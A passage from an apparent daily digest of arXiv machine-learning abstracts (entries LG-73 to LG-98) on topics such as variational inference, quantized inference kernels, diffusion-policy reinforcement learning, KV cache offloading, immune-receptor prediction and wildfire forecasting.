financial institutions.
[LG-73] Variational Learning of Fractional Posteriors
链接: https://arxiv.org/abs/2603.27488
作者: Kian Ming A. Chai,Edwin V. Bonilla
类目: Machine Learning (cs.LG)
*备注: Initial version in Proceedings of the 42nd International Conference on Machine Learning, Vancouver, Canada. PMLR 267, 2025. This version contains a correction for Lemma A.1 and amendments to two surrounding texts: see the last page of the paper at the accompanying github website
Abstract:We introduce a novel one-parameter variational objective that lower bounds the data evidence and enables the estimation of approximate fractional posteriors. We extend this framework to hierarchical construction and Bayes posteriors, offering a versatile tool for probabilistic modelling. We demonstrate two cases where gradients can be obtained analytically and a simulation study on mixture models showing that our fractional posteriors can be used to achieve better calibration compared to posteriors from the conventional variational bound. When applied to variational autoencoders (VAEs), our approach attains higher evidence bounds and enables learning of high-performing approximate Bayes posteriors jointly with fractional posteriors. We show that VAEs trained with fractional posteriors produce decoders that are better aligned for generation from the prior.
[LG-74] RSR-core: A High-Performance Engine for Low-Bit Matrix-Vector Multiplication
链接: https://arxiv.org/abs/2603.27462
作者: Mohsen Dehghankar,Abolfazl Asudeh
类目: Data Structures and Algorithms (cs.DS); Machine Learning (cs.LG); Performance (cs.PF)
*备注:
Abstract:Matrix-vector multiplication is a fundamental building block in neural networks, vector databases, and large language models, particularly during inference. As a result, efficient matrix-vector multiplication engines directly translate into more efficient inference. Recent work has explored low-bit quantization of model weights, where matrices are represented using binary (1-bit) or ternary (1.58-bit) values while activation is kept in higher precision. These representations enable efficient hardware-level computation. In parallel, algorithms such as Redundant Segment Reduction (RSR) provide theoretical guarantees for accelerating low-bit matrix-vector multiplication. However, existing implementations operate at the application level and cannot be efficiently integrated into hardware kernels, limiting practical performance. To bridge this gap, we present RSR-core, a high-performance engine that implements the RSR algorithm as optimized low-level kernels for both CPU and CUDA environments. RSR-core supports efficient matrix-vector multiplication for binary and ternary weight matrices and general vectors while enabling practical deployment of RSR algorithm in real inference pipelines. RSR-core is provided as a production-ready engine with HuggingFace integration for preprocessing low-bit models and running accelerated inference. Experimental results demonstrate significant performance improvements over baseline HuggingFace PyTorch multiplication, achieving up to 62x speedup on CPU and up to 1.9x speedup for token generation on CUDA for popular ternary LLMs. The source code is publicly available at this https URL.
[LG-75] FlowRL: A Taxonomy and Modular Framework for Reinforcement Learning with Diffusion Policies
链接: https://arxiv.org/abs/2603.27450
作者: Chenxiao Gao,Edward Chen,Tianyi Chen,Bo Dai
类目: Machine Learning (cs.LG)
*备注: preprint
Abstract:Thanks to their remarkable flexibility, diffusion models and flow models have emerged as promising candidates for policy representation. However, efficient reinforcement learning (RL) upon these policies remains a challenge due to the lack of explicit log-probabilities for vanilla policy gradient estimators. While numerous attempts have been proposed to address this, the field lacks a unified perspective to reconcile these seemingly disparate methods, thus hampering ongoing development. In this paper, we bridge this gap by introducing a comprehensive taxonomy for RL algorithms with diffusion/flow policies. To support reproducibility and agile prototyping, we introduce a modular, JAX-based open-source codebase that leverages JIT-compilation for high-throughput training. Finally, we provide systematic and standardized benchmarks across Gym-Locomotion, DeepMind Control Suite, and IsaacLab, offering a rigorous side-by-side comparison of diffusion-based methods and guidance for practitioners to choose proper algorithms based on the application. Our work establishes a clear foundation for understanding and algorithm design, a high-efficiency toolkit for future research in the field, and an algorithmic guideline for practitioners in generative models and robotics. Our code is available at this https URL.
[LG-76] Interpretable Physics Extraction from Data for Linear Dynamical Systems using Lie Generator Networks
链接: https://arxiv.org/abs/2603.27442
作者: Shafayeth Jamil,Rehan Kapadia
类目: Machine Learning (cs.LG); Systems and Control (eess.SY)
*备注: 20 pages, 6 figures
Abstract:When the system is linear, why should learning be nonlinear? Linear dynamical systems, the analytical backbone of control theory, signal processing and circuit analysis, have exact closed-form solutions via the state transition matrix. Yet when system parameters must be inferred from data, recent neural approaches offer flexibility at the cost of physical guarantees: Neural ODEs provide flexible trajectory approximation but may violate physical invariants, while energy preserving architectures do not natively represent dissipation essential to real-world systems. We introduce Lie Generator Networks (LGN), which learn a structured generator A and compute trajectories directly via matrix exponentiation. This shift from integration to exponentiation preserves structure by construction. By parameterizing A = S - D (skew-symmetric minus positive diagonal), stability and dissipation emerge from the underlying architecture and are not introduced during training via the loss function. LGN provides a unified framework for linear conservative, dissipative, and time-varying systems. On a 100-dimensional stable RLC ladder, standard derivative-based least-squares system identification can yield unstable eigenvalues. The unconstrained LGN yields stable but physically incorrect spectra, whereas LGN-SD recovers all 100 eigenvalues with over two orders of magnitude lower mean eigenvalue error than unconstrained alternatives. Critically, these eigenvalues reveal poles, natural frequencies, and damping ratios which are interpretable physics that black-box networks do not provide.
[LG-77] he Geometric Cost of Normalization: Affine Bounds on the Bayesian Complexity of Neural Networks
链接: https://arxiv.org/abs/2603.27432
作者: Sungbae Chun
类目: Machine Learning (cs.LG); Information Theory (cs.IT)
*备注: 12 pages, 2 figures
Abstract:LayerNorm and RMSNorm impose fundamentally different geometric constraints on their outputs - and this difference has a precise, quantifiable consequence for model complexity. We prove that LayerNorm’s mean-centering step, by confining data to a linear hyperplane (through the origin), reduces the Local Learning Coefficient (LLC) of the subsequent weight matrix by exactly m/2 (where m is its output dimension); RMSNorm’s projection onto a sphere preserves the LLC entirely. This reduction is structurally guaranteed before any training begins, determined by data manifold geometry alone. The underlying condition is a geometric threshold: for the codimension-one manifolds we study, the LLC drop is binary – any non-zero curvature, regardless of sign or magnitude, is sufficient to preserve the LLC, while only affinely flat manifolds cause the drop. At finite sample sizes this threshold acquires a smooth crossover whose width depends on how much of the data distribution actually experiences the curvature, not merely on whether curvature exists somewhere. We verify both predictions experimentally with controlled single-layer scaling experiments using the wrLLC framework. We further show that Softmax simplex data introduces a “smuggled bias” that activates the same m/2 LLC drop when paired with an explicit downstream bias, proved via the affine symmetry extension of the main theorem and confirmed empirically. Comments: 12 pages, 2 figures Subjects: Machine Learning (cs.LG); Information Theory (cs.IT) Cite as: arXiv:2603.27432 [cs.LG] (or arXiv:2603.27432v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.27432 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-78] Kempe Swap K-Means: A Scalable Near-Optimal Solution for Semi-Supervised Clustering
链接: https://arxiv.org/abs/2603.27417
作者: Yuxuan Ren,Shijie Deng
类目: Machine Learning (cs.LG)
*备注: 42 pages
Abstract:This paper presents a novel centroid-based heuristic algorithm, termed Kempe Swap K-Means, for constrained clustering under rigid must-link (ML) and cannot-link (CL) constraints. The algorithm employs a dual-phase iterative process: an assignment step that utilizes Kempe chain swaps to refine current clustering in the constrained solution space and a centroid update step that computes optimal cluster centroids. To enhance global search capabilities and avoid local optima, the framework incorporates controlled perturbations during the update phase. Empirical evaluations demonstrate that the proposed method achieves near-optimal partitions while maintaining high computational efficiency and scalability. The results indicate that Kempe Swap K-Means consistently outperforms state-of-the-art benchmarks in both clustering accuracy and algorithmic efficiency for large-scale datasets.
[LG-79] Rainbow-DemoRL: Combining Improvements in Demonstration-Augmented Reinforcement Learning ICRA2026
链接: https://arxiv.org/abs/2603.27400
作者: Dwait Bhatt,Shih-Chieh Chou,Nikolay Atanasov
类目: Robotics (cs.RO); Machine Learning (cs.LG)
*备注: Accepted to ICRA 2026
Abstract:Several approaches have been proposed to improve the sample efficiency of online reinforcement learning (RL) by leveraging demonstrations collected offline. The offline data can be used directly as transitions to optimize RL objectives, or offline policy and value functions can first be learned from the data and then used for online finetuning or to provide reference actions. While each of these strategies has shown compelling results, it is unclear which method has the most impact on sample efficiency, whether these approaches can be combined, and if there are cumulative benefits. We classify existing demonstration-augmented RL approaches into three categories and perform an extensive empirical study of their strengths, weaknesses, and combinations to isolate the contribution of each strategy and determine effective hybrid combinations for sample-efficient online RL. Our analysis reveals that directly reusing offline data and initializing with behavior cloning consistently outperform more complex offline RL pretraining methods for improving online sample efficiency.
[LG-80] K-Means Based TinyML Anomaly Detection and Distributed Model Reuse via the Distributed Internet of Learning (DIoL) ATC2026
链接: https://arxiv.org/abs/2603.27393
作者: Abdulrahman Albaiz,Fathi Amsaad
类目: Machine Learning (cs.LG)
*备注: SaTC 2026 Conference
Abstract:This paper presents a lightweight K-Means anomaly detection model and a distributed model-sharing workflow designed for resource-constrained microcontrollers (MCUs). Using real power measurements from a mini-fridge appliance, the system performs on-device feature extraction, clustering, and threshold estimation to identify abnormal appliance behavior. To avoid retraining models on every device, we introduce the Distributed Internet of Learning (DIoL), which enables a model trained on one MCU to be exported as a portable, text-based representation and reused directly on other devices. A two-device prototype demonstrates the feasibility of the “Train Once, Share Everywhere” (TOSE) approach using a real-world appliance case study, where Device A trains the model and Device B performs inference without retraining. Experimental results show consistent anomaly detection behavior, negligible parsing overhead, and identical inference runtimes between standalone and DIoL-based operation. The proposed framework enables scalable, low-cost TinyML deployment across fleets of embedded devices.
[LG-81] Active In-Context Learning for Tabular Foundation Models
链接: https://arxiv.org/abs/2603.27385
作者: Wilailuck Treerath,Fabrizio Pittorino
类目: Machine Learning (cs.LG)
*备注: 8 pages, 4 figures, 6 tables
Abstract:Active learning (AL) reduces labeling cost by querying informative samples, but in tabular settings its cold-start gains are often limited because uncertainty estimates are unreliable when models are trained on very few labels. Tabular foundation models such as TabPFN provide calibrated probabilistic predictions via in-context learning (ICL), i.e., without task-specific weight updates, enabling an AL regime in which the labeled context - rather than parameters - is iteratively optimized. We formalize Tabular Active In-Context Learning (Tab-AICL) and instantiate it with four acquisition rules: uncertainty (TabPFN-Margin), diversity (TabPFN-Coreset), an uncertainty-diversity hybrid (TabPFN-Hybrid), and a scalable two-stage method (TabPFN-Proxy-Hybrid) that shortlists candidates using a lightweight linear proxy before TabPFN-based selection. Across 20 classification benchmarks, Tab-AICL improves cold-start sample efficiency over retrained gradient-boosting baselines (CatBoost-Margin and XGBoost-Margin), measured by normalized AULC up to 100 labeled samples.
[LG-82] Embedding Provenance in Computer Vision Datasets with JSON-LD
链接: https://arxiv.org/abs/2603.27348
作者: Lynn Vonderhaar,Timothy Elvira,Tyler Thomas Procko,Omar Ochoa
类目: Machine Learning (cs.LG)
*备注:
Abstract:With the ubiquity of computer vision in industry, the importance of image provenance is becoming more apparent. Provenance provides information about the origin and derivation of some resource, e.g., an image dataset, enabling users to trace data changes to better understand the expected behaviors of downstream models trained on such data. Provenance may also help with data maintenance by ensuring compliance, supporting audits and improving reusability. Typically, if provided, provenance is stored separately, e.g., within a text file, leading to a loss of descriptive information for key details like image capture settings, data preprocessing steps, and model architecture or iteration. Images often lack the information detailing the parameters of their creation or compilation. This paper proposes a novel schema designed to structure image provenance in a manageable and coherent format. The approach utilizes JavaScript Object Notation for Linked Data (JSON-LD), embedding this provenance directly within the image file. This offers two significant benefits: (1) it aligns image descriptions with a robust schema inspired by and linked to established standards, and (2) it ensures that provenance remains intrinsically tied to images, preventing loss of information and enhancing system qualities, e.g., maintainability and adaptability. This approach emphasizes maintaining the direct connection between vision resources and their provenance.
[LG-83] Scalable Maximum Entropy Population Synthesis via Persistent Contrastive Divergence
链接: https://arxiv.org/abs/2603.27312
作者: Mirko Degli Esposti
类目: Machine Learning (cs.LG)
*备注:
Abstract:Maximum entropy (MaxEnt) modelling provides a principled framework for generating synthetic populations from aggregate census data, without access to individual-level microdata. The bottleneck of existing approaches is exact expectation computation, which requires summing over the full tuple space \cX and becomes infeasible for more than K \approx 20 categorical attributes. We propose \emphGibbsPCDSolver, a stochastic replacement for this computation based on Persistent Contrastive Divergence (PCD): a persistent pool of N synthetic individuals is updated by Gibbs sweeps at each gradient step, providing a stochastic approximation of the model expectations without ever materialising \cX . We validate the approach on controlled benchmarks and on \emphSyn-ISTAT, a K=15 Italian demographic benchmark with analytically exact marginal targets derived from ISTAT-inspired conditional probability tables. Scaling experiments across K \in \12, 20, 30, 40, 50\ confirm that GibbsPCDSolver maintains \MRE \in [0.010, 0.018] while |\cX| grows eighteen orders of magnitude, with runtime scaling as O(K) rather than O(|\cX|) . On Syn-ISTAT, GibbsPCDSolver reaches \MRE=0.03 on training constraints and – crucially – produces populations with effective sample size \Neff = N versus \Neff \approx 0.012,N for generalised raking, an 86.8\times diversity advantage that is essential for agent-based urban simulations.
[LG-84] From Inference Routing to Agent Orchestration: Declarative Policy Compilation with Cross-Layer Verification
链接: https://arxiv.org/abs/2603.27299
作者: Huamin Chen,Xunzhuo Liu,Bowei He,Xue Liu
类目: Machine Learning (cs.LG)
*备注: Position Paper
Abstract:The Semantic Router DSL is a non-Turing-complete policy language deployed in production for per-request LLM inference routing: content signals (embedding similarity, PII detection, jailbreak scoring) feed into weighted projections and priority-ordered decision trees that select a model, enforce privacy policies, and produce structured audit traces – all from a single declarative source file. Prior work established conflict-free compilation for probabilistic predicates and positioned the DSL within the Workload-Router-Pool inference architecture. This paper extends the same language from stateless, per-request routing to multi-step agent workflows – the full path from inference gateway to agent orchestration to infrastructure deployment. The DSL compiler emits verified decision nodes for orchestration frameworks (LangGraph, OpenClaw), Kubernetes artifacts (NetworkPolicy, Sandbox CRD, ConfigMap), YANG/NETCONF payloads, and protocol-boundary gates (MCP, A2A) – all from the same source. Because the language is non-Turing-complete, the compiler guarantees exhaustive routing, conflict-free branching, referential integrity, and audit traces structurally coupled to the decision logic. Because signal definitions are shared across targets, a threshold change propagates from inference gateway to agent gate to infrastructure artifact in one compilation step – eliminating cross-team coordination as the primary source of policy drift. We ground the approach in four pillars – auditability, cost efficiency, verifiability, and tunability – and identify the verification boundary at each layer. Comments: Position Paper Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.27299 [cs.LG] (or arXiv:2603.27299v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.27299 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-85] Omni-Modal Dissonance Benchmark: Systematically Breaking Modality Consensus to Probe Robustness and Calibrated Abstention
链接: https://arxiv.org/abs/2603.27187
作者: Zabir Al Nazi,Shubhashis Roy Dipta,Md Rizwan Parvez
类目: Machine Learning (cs.LG)
*备注:
Abstract:Existing omni-modal benchmarks attempt to measure modality-specific contributions, but their measurements are confounded: naturally co-occurring modalities carry correlated yet unequal information, making it unclear whether results reflect true modality reliance or information asymmetry. We introduce OMD-Bench, where all modalities are initially congruent - each presenting the same anchor, an object or event independently perceivable through video, audio, and text - which we then systematically corrupt to isolate each modality’s contribution. We also evaluate calibrated abstention: whether models appropriately refrain from answering when evidence is conflicting. The benchmark comprises 4,080 instances spanning 27 anchors across eight corruption conditions. Evaluating ten omni-modal models under zero-shot and chain-of-thought prompting, we find that models over-abstain when two modalities are corrupted yet under-abstain severely when all three are, while maintaining high confidence (~60-100%) even under full corruption. Chain-of-thought prompting improves abstention alignment with human judgment but amplifies overconfidence rather than mitigating it. OMD-Bench provides a diagnostic benchmark for diagnosing modality reliance, robustness to cross-modal inconsistency, and uncertainty calibration in omni-modal systems.
[LG-86] Hybrid Deep Learning with Temporal Data Augmentation for Accurate Remaining Useful Life Prediction of Lithium-Ion Batteries
链接: https://arxiv.org/abs/2603.27186
作者: Yun Tian,Guili Wang,Jian Bi,Kaixin Han,Chenglu Wu,Zhiyi Lu,Chenhao Li,Liangwang Sun,Minyu Zhou,Chenchen Xu
类目: Machine Learning (cs.LG)
*备注:
Abstract:Accurate prediction of lithium-ion battery remaining useful life (RUL) is essential for reliable health monitoring and data-driven analysis of battery degradation. However, the robustness and generalization capabilities of existing RUL prediction models are significantly challenged by complex operating conditions and limited data availability. To address these limitations, this study proposes a hybrid deep learning model, CDFormer, which integrates convolutional neural networks, deep residual shrinkage networks, and Transformer encoders extract multiscale temporal features from battery measurement signals, including voltage, current, and capacity. This architecture enables the joint modeling of local and global degradation dynamics, effectively improving the accuracy of RUL this http URL enhance predictive reliability, a composite temporal data augmentation strategy is proposed, incorporating Gaussian noise, time warping, and time resampling, explicitly accounting for measurement noise and variability. CDFormer is evaluated on two real-world datasets, with experimental results demonstrating its consistent superiority over conventional recurrent neural network-based and Transformer-based baselines across key metrics. By improving the reliability and predictive performance of RUL prediction from measurement data, CDFormer provides accurate and reliable forecasts, supporting effective battery health monitoring and data-driven maintenance strategies.
[LG-87] Online Learning of Kalman Filtering: From Output to State Estimation
链接: https://arxiv.org/abs/2603.27159
作者: Lintao Ye,Ankang Zhang,Ming Chi,Bin Du,Jianghai Hu
类目: Machine Learning (cs.LG); Systems and Control (eess.SY); Optimization and Control (math.OC)
*备注:
Abstract:In this paper, we study the problem of learning Kalman filtering with unknown system model in partially observed linear dynamical systems. We propose a unified algorithmic framework based on online optimization that can be used to solve both the output estimation and state estimation scenarios. By exploring the properties of the estimation error cost functions, such as conditionally strong convexity, we show that our algorithm achieves a \log T -regret in the horizon length T for the output estimation scenario. More importantly, we tackle the more challenging scenario of learning Kalman filtering for state estimation, which is an open problem in the literature. We first characterize a fundamental limitation of the problem, demonstrating the impossibility of any algorithm to achieve sublinear regret in T . By further introducing a random query scheme into our algorithm, we show that a \sqrtT -regret is achievable when rendering the algorithm limited query access to more informative measurements of the system state in practice. Our algorithm and regret readily capture the trade-off between the number of queries and the achieved regret, and shed light on online learning problems with limited observations. We validate the performance of our algorithms using numerical examples.
[LG-88] Preconditioned Attention: Enhancing Efficiency in Transformers AISTATS2026
链接: https://arxiv.org/abs/2603.27153
作者: Hemanth Saratchandran
类目: Machine Learning (cs.LG)
*备注: AISTATS 2026
Abstract:Central to the success of Transformers is the attention block, which effectively models global dependencies among input tokens associated to a dataset. However, we theoretically demonstrate that standard attention mechanisms in transformers often produce ill-conditioned matrices with large condition numbers. This ill-conditioning is a well-known obstacle for gradient-based optimizers, leading to inefficient training. To address this issue, we introduce preconditioned attention, a novel approach that incorporates a conditioning matrix into each attention head. Our theoretical analysis shows that this method significantly reduces the condition number of attention matrices, resulting in better-conditioned matrices that improve optimization. Conditioned attention serves as a simple drop-in replacement for a wide variety of attention mechanisms in the literature. We validate the effectiveness of preconditioned attention across a diverse set of transformer applications, including image classification, object detection, instance segmentation, long sequence modeling and language modeling.
[LG-89] ScoutAttention: Efficient KV Cache Offloading via Layer-Ahead CPU Pre-computation for LLM Inference
链接: https://arxiv.org/abs/2603.27138
作者: Qiuyang Zhang,Kai Zhou,Ding Tang,Kai Lu,Cheng Li,Zhenyu Yang,Peng Xu,Jiguang Wan
类目: Machine Learning (cs.LG)
*备注: Accepted at the 63rd Design Automation Conference (DAC 2026)
Abstract:Large language models encounter critical GPU memory capacity constraints during long-context inference, where KV cache memory consumption severely limits decode batch sizes. While existing research has explored offloading KV cache to DRAM, these approaches either demand frequent GPU-CPU data transfers or impose extensive CPU computation requirements, resulting in poor GPU utilization as the system waits for I/O operations or CPU processing to complete. We propose ScoutAttention, a novel KV cache offloading framework that accelerates LLM inference through collaborative GPU-CPU attention computation. To prevent CPU computation from bottlenecking the system, ScoutAttention introduces GPU-CPU collaborative block-wise sparse attention that significantly reduces CPU load. Unlike conventional parallel computing approaches, our framework features a novel layer-ahead CPU pre-computation algorithm, enabling the CPU to initiate attention computation one layer in advance, complemented by asynchronous periodic recall mechanisms to maintain minimal CPU compute load. Experimental results demonstrate that ScoutAttention maintains accuracy within 2.4% of baseline while achieving 2.1x speedup compared to existing offloading methods. Comments: Accepted at the 63rd Design Automation Conference (DAC 2026) Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.27138 [cs.LG] (or arXiv:2603.27138v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.27138 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-90] Spectral-Aware Text-to-Time Series Generation with Billion-Scale Multimodal Meteorological Data IJCNN2026
链接: https://arxiv.org/abs/2603.27135
作者: Shijie Zhang
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: Accepted By IJCNN 2026 (WCCI)
Abstract:Text-to-time-series generation is particularly important in meteorology, where natural language offers intuitive control over complex, multi-scale atmospheric dynamics. Existing approaches are constrained by the lack of large-scale, physically grounded multimodal datasets and by architectures that overlook the spectral-temporal structure of weather signals. We address these challenges with a unified framework for text-guided meteorological time-series generation. First, we introduce MeteoCap-3B, a billion-scale weather dataset paired with expert-level captions constructed via a Multi-agent Collaborative Captioning (MACC) pipeline, yielding information-dense and physically consistent annotations. Building on this dataset, we propose MTransformer, a diffusion-based model that enables precise semantic control by mapping textual descriptions into multi-band spectral priors through a Spectral Prompt Generator, which guides generation via frequency-aware attention. Extensive experiments on real-world benchmarks demonstrate state-of-the-art generation quality, accurate cross-modal alignment, strong semantic controllability, and substantial gains in downstream forecasting under data-sparse and zero-shot settings. Additional results on general time-series benchmarks indicate that the proposed framework generalizes beyond meteorology.
[LG-91] Semantic Interaction Information mediates compositional generalization in latent space
链接: https://arxiv.org/abs/2603.27134
作者: John Schwarcz
类目: Machine Learning (cs.LG)
*备注:
Abstract:Are there still barriers to generalization once all relevant variables are known? We address this question via a framework that casts compositional generalization as a variational inference problem over latent variables with parametric interactions. To explore this, we develop the Cognitive Gridworld, a stationary Partially Observable Markov Decision Process (POMDP) where observations are generated jointly by multiple latent variables, yet feedback is provided for only a single goal variable. This setting allows us to define Semantic Interaction Information (SII): a metric measuring the contribution of latent variable interactions to task performance. Using SII, we analyze Recurrent Neural Networks (RNNs) provided with these interactions, finding that SII explains the accuracy gap between Echo State and Fully Trained networks. Our analysis also uncovers a theoretically predicted failure mode where confidence decouples from accuracy, suggesting that utilizing interactions between relevant variables is a non-trivial capability. We then address a harder regime where the interactions must be learned by an embedding model. Learning how latent variables interact requires accurate inference, yet accurate inference depends on knowing those interactions. The Cognitive Gridworld reveals this circular dependence as a core challenge for continual meta-learning. We approach this dilemma via Representation Classification Chains (RCCs), a JEPA-style architecture that disentangles these processes: variable inference and variable embeddings are learned by separate modules through Reinforcement Learning and self-supervised learning, respectively. Lastly, we demonstrate that RCCs facilitate compositional generalization to novel combinations of relevant variables. Together, these results establish a grounded setting for evaluating goal-directed generalist agents. Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.27134 [cs.LG] (or arXiv:2603.27134v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.27134 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-92] Maximin Learning of Individualized Treatment Effect on Multi-Domain Outcomes
链接: https://arxiv.org/abs/2603.27114
作者: Yuying Lu,Wenbo Fei,Yuanjia Wang,Molei Liu
类目: Machine Learning (cs.LG); Methodology (stat.ME)
*备注:
Abstract:Precision mental health requires treatment decisions that account for heterogeneous symptoms reflecting multiple clinical domains. However, existing methods for estimating individualized treatment effects (ITE) rely on a single summary outcome or a specific set of observed symptoms or measures, which are sensitive to symptom selection and limit generalizability to unmeasured yet clinically relevant domains. We propose DRIFT, a new maximin framework for estimating robust ITEs from high-dimensional item-level data by leveraging latent factor representations and adversarial learning. DRIFT learns latent constructs via generalized factor analysis, then constructs an anchored on-target uncertainty set that extrapolates beyond the observed measures to approximate the broader hyper-population of potential outcomes. By optimizing worst-case performance over this uncertainty set, DRIFT yields ITEs that are robust to underrepresented or unmeasured domains. We further show that DRIFT is invariant to admissible reparameterizations of the latent factors and admits a closed-form maximin solution, with theoretical guarantees for identification and convergence. In analyses of a randomized controlled trial for major depressive disorder (EMBARC), DRIFT demonstrates superior performance and improved generalizability to external multi-domain outcomes, including side effects and self-reported symptoms not used during training.
[LG-93] Hierarchy-Guided Topology Latent Flow for Molecular Graph Generation ICLR2026
链接: https://arxiv.org/abs/2603.27113
作者: Urvi Awasthi,Alexander Arjun Lobo,Leonid Zhukov
类目: Machine Learning (cs.LG); Materials Science (cond-mat.mtrl-sci); Machine Learning (stat.ML)
*备注: 22 pages, 2 figures, 6 tables. Accepted to ICLR 2026 AI4Mat Workshop
Abstract:Generating chemically valid 3D molecules is hindered by discrete bond topology: small local bond errors can cause global failures (valence violations, disconnections, implausible rings), especially for drug-like molecules with long-range constraints. Many unconditional 3D generators emphasize coordinates and then infer bonds or rely on post-processing, leaving topology feasibility weakly controlled. We propose Hierarchy-Guided Latent Topology Flow (HLTF), a planner-executor model that generates bond graphs with 3D coordinates, using a latent multi-scale plan for global context and a constraint-aware sampler to suppress topology-driven failures. On QM9, HLTF achieves 98.8% atom stability and 92.9% valid-and-unique, improving PoseBusters validity to 94.0% (+0.9 over the strongest reported baseline). On GEOM-DRUGS, HLTF attains 85.5%/85.0% validity/valid-unique-novel without post-processing and 92.2%/91.2% after standardized relaxation, within 0.9 points of the best post-processed baseline. Explicit topology generation also reduces “false-valid” samples that pass RDKit sanitization but fail stricter checks.
[LG-94] Conformalized Signal Temporal Logic Inference under Covariate Shift
链接: https://arxiv.org/abs/2603.27062
作者: Yixuan Wang,Danyang Li,Matthew Cleaveland,Roberto Tron,Mingyu Cai
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Signal Temporal Logic (STL) inference learns interpretable logical rules for temporal behaviors in dynamical systems. To ensure the correctness of learned STL formulas, recent approaches have incorporated conformal prediction as a statistical tool for uncertainty quantification. However, most existing methods rely on the assumption that calibration and testing data are identically distributed and exchangeable, an assumption that is frequently violated in real-world settings. This paper proposes a conformalized STL inference framework that explicitly addresses covariate shift between training and deployment trajectories dataset. From a technical standpoint, the approach first employs a template-free, differentiable STL inference method to learn an initial model, and subsequently refines it using a limited deployment side dataset to promote distribution alignment. To provide validity guarantees under distribution shift, the framework estimates the likelihood ratio between training and deployment distributions and integrates it into an STL-robustness-based weighted conformal prediction scheme. Experimental results on trajectory datasets demonstrate that the proposed framework preserves the interpretability of STL formulas while significantly improving symbolic learning reliability at deployment time.
[LG-95] Liquid Networks with Mixture Density Heads for Efficient Imitation Learning
链接: https://arxiv.org/abs/2603.27058
作者: Nikolaus Correll
类目: Machine Learning (cs.LG); Robotics (cs.RO)
*备注:
Abstract:We compare liquid neural networks with mixture density heads against diffusion policies on Push-T, RoboMimic Can, and PointMaze under a shared-backbone comparison protocol that isolates policy-head effects under matched inputs, training budgets, and evaluation settings. Across tasks, liquid policies use roughly half the parameters (4.3M vs. 8.6M), achieve 2.4x lower offline prediction error, and run 1.8 faster at inference. In sample-efficiency experiments spanning 1% to 46.42% of training data, liquid models remain consistently more robust, with especially large gains in low-data and medium-data regimes. Closed-loop results on Push-T and PointMaze are directionally consistent with offline rankings but noisier, indicating that strong offline density modeling helps deployment while not fully determining closed-loop success. Overall, liquid recurrent multimodal policies provide a compact and practical alternative to iterative denoising for imitation learning.
[LG-96] Beyond Freshness and Semantics: A Coupon-Collector Framework for Effective Status Updates
链接: https://arxiv.org/abs/2603.26998
作者: Youssef Ahmed,Arnob Ghosh,Chih-Chun Wang,Ness B. Shroff
类目: ystems and Control (eess.SY); Information Theory (cs.IT); Machine Learning (cs.LG)
*备注: 12 pages, 5 figures, extended version of a paper accepted to WiOpt 2026
Abstract:For status update systems operating over unreliable energy-constrained wireless channels, we address Weaver’s long-standing Level-C question: do my packets actually improve the plant’s behavior? Each fresh sample carries a stochastic expiration time – governed by the plant’s instability dynamics – after which the information becomes useless for control. Casting the problem as a coupon-collector variant with expiring coupons, we (i) formulate a two-dimensional average-reward MDP, (ii) prove that the optimal schedule is doubly thresholded in the receiver’s freshness timer and the sender’s stored lifetime, (iii) derive a closed-form policy for deterministic lifetimes, and (iv) design a Structure-Aware Q-learning algorithm (SAQ) that learns the optimal policy without knowing the channel success probability or lifetime distribution. Simulations validate our theoretical predictions: SAQ matches optimal Value Iteration performance while converging significantly faster than baseline Q-learning, and expiration-aware scheduling achieves up to 50% higher reward than age-based baselines by adapting transmissions to state-dependent urgency – thereby delivering Level-C effectiveness under tight resource constraints.
[LG-97] ImmSET: Sequence-Based Predictor of TCR-pMHC Specificity at Scale ML4H2025
链接: https://arxiv.org/abs/2603.26994
作者: Marco Garcia Noceda,Matthew T Noakes,Andrew FigPope,Daniel E Mattox,Bryan Howie,Harlan Robins
类目: Machine Learning (cs.LG); Quantitative Methods (q-bio.QM)
*备注: Accepted to ML4H 2025 (Proceedings Track). To appear in PMLR 297
Abstract:T cells are a critical component of the adaptive immune system, playing a role in infectious disease, autoimmunity, and cancer. T cell function is mediated by the T cell receptor (TCR) protein, a highly diverse receptor targeting specific peptides presented by the major histocompatibility complex (pMHCs). Predicting the specificity of TCRs for their cognate pMHCs is central to understanding adaptive immunity and enabling personalized therapies. However, accurate prediction of this protein-protein interaction remains challenging due to the extreme diversity of both TCRs and pMHCs. Here, we present ImmSET (Immune Synapse Encoding Transformer), a novel sequence-based architecture designed to model interactions among sets of variable-length biological sequences. We train this model across a range of dataset sizes and compositions and study the resulting models’ generalization to pMHC targets. We describe a failure mode in prior sequence-based approaches that inflates previously reported performance on this task and show that ImmSET remains robust under stricter evaluation. In systematically testing the scaling behavior of ImmSET with training data, we show that performance scales consistently with data volume across multiple data types and compares favorably with the pre-trained protein language model ESM2 fine-tuned on the same datasets. Finally, we demonstrate that ImmSET can outperform AlphaFold2 and AlphaFold3-based pipelines on TCR-pMHC specificity prediction when provided sufficient training data. This work establishes ImmSET as a scalable modeling paradigm for multi-sequence interaction problems, demonstrated in the TCR-pMHC setting but generalizable to other biological domains where high-throughput sequence-driven reasoning complements structure prediction and experimental mapping.
[LG-98] Probabilistic Forecasting of Localized Wildfire Spread Based on Conditional Flow Matching
链接: https://arxiv.org/abs/2603.26975
作者: Bryan Shaddy,Haitong Qin,Brianna Binder,James Haley,Riya Duddalwar,Kyle Hilburn,Assad Oberai
类目: Machine Learning (cs.LG)
*备注:
